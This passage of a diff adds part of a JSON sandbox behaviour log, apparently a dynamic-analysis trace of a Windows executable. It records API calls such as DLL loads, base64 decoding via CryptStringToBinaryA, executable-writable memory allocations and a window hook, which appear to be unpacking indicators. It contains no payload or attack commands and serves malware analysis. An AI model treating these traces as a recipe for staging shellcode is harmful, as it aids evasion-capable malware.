"OleCreatePictureIndirect" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76f31410" + } + ], + "repeated": 0, + "id": 152 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "OLEAUT32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76f00000" + }, + { + "name": "FunctionName", + "value": "OleLoadPicture" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76f6c8a0" + } + ], + "repeated": 0, + "id": 153 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "OLEAUT32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76f00000" + }, + { + "name": "FunctionName", + "value": "OleTranslateColor" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76f168f0" + } + ], + "repeated": 0, + "id": 154 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "OLEAUT32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76f00000" + }, + { + "name": "FunctionName", + "value": "OleCreatePropertyFrame" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76f6c7d0" + } + ], + "repeated": 0, + "id": 155 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "OLEAUT32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76f00000" + }, + { + "name": "FunctionName", + "value": "OleCreatePropertyFrameIndirect" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76f6c840" + } + ], + "repeated": 0, + "id": 156 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x76111795", + "parentcaller": "0x76111760", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\olepro32" + }, + { + "name": "BaseAddress", + "value": "0x72e50000" + }, + { + "name": "InitRoutine", + "value": "0x72e5e970" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 157 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 158 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "452", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x004e4000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 159 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "452", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 160 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "2748", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x004e7000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 161 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "2748", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 162 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "8700", + "caller": "0x77041bae", + "parentcaller": "0x7703db51", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000080" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 1, + "id": 163 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "6568", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x004ea000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 164 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "6568", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 165 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "8700", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x004ed000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 166 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "8700", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 167 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00414282", + "parentcaller": "0x00000000", + "category": "misc", + "api": "HeapCreate", + "status": true, + "return": "0x04be0000", + "arguments": [ + { + "name": "Options", + "value": "0" + }, + { + "name": "InitialSize", + "value": "0x00001000" + }, + { + "name": "MaximumSize", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 168 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00414a45", + "parentcaller": "0x004111f7", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04be1000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 169 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00414a5f", + "parentcaller": "0x004111f7", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04ac0000" + }, + { + "name": "RegionSize", + "value": "0x00100000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 170 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00414aeb", + "parentcaller": "0x004147ba", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04ac0000" + }, + { + "name": "RegionSize", + "value": "0x00008000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 171 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00413e0c", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "KERNEL32" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + } + ], + "repeated": 0, + "id": 172 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00413e1c", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "IsProcessorFeaturePresent" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76111210" + } + ], + "repeated": 0, + "id": 173 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x004172cd", + "parentcaller": "0x00000000", + "category": "hooking", + "api": "SetUnhandledExceptionFilter", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ExceptionFilter", + "value": "0x0041727c" + } + ], + "repeated": 0, + "id": 174 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x0043dd20", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04bf0000" + }, + { + "name": "RegionSize", + "value": "0x00080000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 175 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x0043dd20", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04bf0000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 176 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x0043cc57", + "parentcaller": "0x0043c600", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "user32" + }, + { + "name": "BaseAddress", + "value": "0x76b60000" + } + ], + "repeated": 0, + "id": 177 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x0043cc57", + "parentcaller": "0x0043c600", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\uxtheme" + }, + { + "name": "DllBase", + "value": "0x73d00000" + } + ], + "repeated": 0, + "id": 178 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x0043cc57", + "parentcaller": "0x0043c600", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\uxtheme.dll" + }, + { + "name": "BaseAddress", + "value": "0x73d00000" + } + ], + "repeated": 0, + "id": 179 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x0043cc57", + "parentcaller": "0x0043c600", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\System32\\bcryptPrimitives" + }, + { + "name": "DllBase", + "value": "0x76090000" + } + ], + "repeated": 0, + "id": 180 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x0043cc57", + "parentcaller": "0x0043c600", + "category": "misc", + "api": "GetCursorPos", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "x", + "value": "41" + }, + { + "name": "y", + "value": "333" + } + ], + "repeated": 0, + "id": 181 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00429b56", + "parentcaller": "0x00000000", + "category": "system", + "api": "SetWindowsHookExA", + "status": true, + "return": "0x001602a9", + "arguments": [ + { + "name": "HookIdentifier", + "value": "18446744073709551615" + }, + { + "name": "ProcedureAddress", + "value": "0x00429e85" + }, + { + "name": "ModuleAddress", + "value": "0x00000000" + }, + { + "name": "ThreadId", + "value": "9452" + } + ], + "repeated": 0, + "id": 182 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00401cf5", + "parentcaller": "0x00402cb5", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "CRYPT32.DLL" + }, + { + "name": "BaseAddress", + "value": "0x767c0000" + } + ], + "repeated": 0, + "id": 183 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00401cfc", + "parentcaller": "0x00402cb5", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x767c0000" + }, + { + "name": "FunctionName", + "value": "CryptStringToBinaryA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76807570" + } + ], + "repeated": 0, + "id": 184 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x004101a5", + "parentcaller": "0x00403072", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04be6000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 185 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x004101a5", + "parentcaller": "0x00403072", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04be7000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 186 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x004101a5", + "parentcaller": "0x00403072", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04be8000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 187 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x004101a5", + "parentcaller": "0x00403072", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04be9000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 188 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x004101a5", + "parentcaller": "0x00403072", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04beb000" + }, + { + "name": "RegionSize", + "value": "0x00004000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 189 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00401cf5", + "parentcaller": "0x00402b98", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "CRYPT32.DLL" + }, + { + "name": "BaseAddress", + "value": "0x767c0000" + } + ], + "repeated": 0, + "id": 190 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00401cfc", + "parentcaller": "0x00402b98", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x767c0000" + }, + { + "name": "FunctionName", + "value": "CryptStringToBinaryA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76807570" + } + ], + "repeated": 0, + "id": 191 + }, + { + "timestamp": "2025-03-07 21:41:18,999", + "thread_id": "9452", + "caller": "0x00402bb7", + "parentcaller": "0x00402cc1", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02280000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000040", + "pretty_value": "PAGE_EXECUTE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 192 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x00402bdd", + "parentcaller": "0x00402cc1", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02290000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000040", + "pretty_value": "PAGE_EXECUTE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 193 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x02280637", + "parentcaller": "0x02280202", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "ADVAPI32.DLL" + }, + { + "name": "BaseAddress", + "value": "0x762a0000" + } + ], + "repeated": 4, + "id": 194 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "CRYPTSP.dll" + } + ], + "repeated": 0, + "id": 195 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\CRYPTSP.dll" + } + ], + "repeated": 0, + "id": 196 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\cryptsp.dll" + } + ], + "repeated": 0, + "id": 197 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000021c" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\cryptsp.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 198 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000290" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x0000021c" + } + ], + "repeated": 0, + "id": 199 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000290" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x743f0000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00013000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 200 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74400000" + }, + { + "name": "ModuleName", + "value": "CRYPTSP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 201 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 202 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 203 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x743ff000" + }, + { + "name": "ModuleName", + "value": "CRYPTSP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 204 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000290" + } + ], + "repeated": 0, + "id": 205 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000021c" + } + ], + "repeated": 0, + "id": 206 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x743ff000" + }, + { + "name": "ModuleName", + "value": "CRYPTSP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 207 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 208 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 209 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": 